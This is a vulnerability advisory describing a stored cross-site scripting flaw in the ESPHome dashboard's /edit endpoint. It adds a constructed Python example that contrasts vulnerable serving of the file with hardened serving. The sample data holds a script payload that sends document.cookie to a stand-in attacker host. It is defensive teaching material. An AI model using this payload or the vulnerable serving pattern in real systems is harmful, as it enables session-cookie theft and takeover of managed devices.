Safety vulnerability ID: 78713
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the esphome package are vulnerable to Cross-Site Scripting (XSS) because the dashboard serves unsanitized configuration content with an HTML content type. The `/edit` endpoint of the dashboard component lets a remote authenticated user write arbitrary JavaScript into a configuration file without sanitization, and the same endpoint then returns that file with `Content-Type: text/html; charset=UTF-8`, so the browser executes the embedded script. An authenticated attacker can send a POST to `/edit?configuration=[file]` containing a malicious script and then lure a victim into visiting `/edit?configuration=[file]`; the script runs in the victim's dashboard session, enabling exfiltration of session cookies and unauthorized operations such as reading, editing and deleting configuration files and flashing firmware onto managed boards.
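The following is an added example, not ESPHome's own dashboard code, that reproduces the flaw class described above in isolation: the same stored configuration text is served once with an HTML content type (the vulnerable pattern) and once as plain text with MIME sniffing disabled and a restrictive CSP (the hardened pattern), alongside an escaping helper for the case where the editor must embed the text inside an HTML page. The function names, the sample YAML and the `browser_would_execute_script` model are constructed for this example.

```python
"""Added example: serving user-controlled configuration text as HTML versus
serving it safely. Not ESPHome's code; names and sample data are constructed."""
import html

# Constructed sample: a YAML configuration with an injected script payload
# hidden in a comment, as an attacker could store it through an /edit POST.
INJECTED_CONFIG = (
    "esphome:\n"
    "  name: livingroom\n"
    "# <script>fetch('https://attacker.example/?c=' + document.cookie)</script>\n"
)


def serve_config_vulnerable(content: str) -> tuple[dict, bytes]:
    """Vulnerable pattern: return the raw file text with an HTML content type.
    A browser will parse the body as a document and run the <script>."""
    headers = {"Content-Type": "text/html; charset=UTF-8"}
    return headers, content.encode("utf-8")


def serve_config_hardened(content: str) -> tuple[dict, bytes]:
    """Hardened pattern: declare the body as plain text, forbid MIME sniffing
    so the browser cannot reinterpret it as HTML, and attach a CSP that
    blocks script execution even if the type were ever misreported."""
    headers = {
        "Content-Type": "text/plain; charset=UTF-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'",
    }
    return headers, content.encode("utf-8")


def render_config_in_page(content: str) -> str:
    """If the editor must show the text inside an HTML page, escape it first
    so '<', '>', '&' and quotes become entities and cannot open a tag."""
    return "<pre>" + html.escape(content, quote=True) + "</pre>"


def browser_would_execute_script(headers: dict, body: bytes) -> bool:
    """Rough model of browser behaviour used as the check in this example:
    a <script> element only runs when the response is treated as HTML."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "text/html":
        return False
    return b"<script" in body.lower()


if __name__ == "__main__":
    for name, serve in (("vulnerable", serve_config_vulnerable),
                        ("hardened", serve_config_hardened)):
        hdrs, body = serve(INJECTED_CONFIG)
        print(f"{name:10s} Content-Type={hdrs['Content-Type']!r} "
              f"script runs: {browser_would_execute_script(hdrs, body)}")
    print(render_config_in_page(INJECTED_CONFIG))
```

When auditing a file-editing endpoint, the practical check is the one `browser_would_execute_script` approximates: fetch a file whose body contains `<script>` and confirm the response carries a non-HTML `Content-Type` together with `X-Content-Type-Options: nosniff`; if the content is instead rendered inside an HTML page, confirm the angle brackets arrive as `&lt;` and `&gt;`.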
Latest version: 2025.9.3
ESPHome is a system to configure your microcontrollers by simple yet powerful configuration files and control them remotely through Home Automation systems.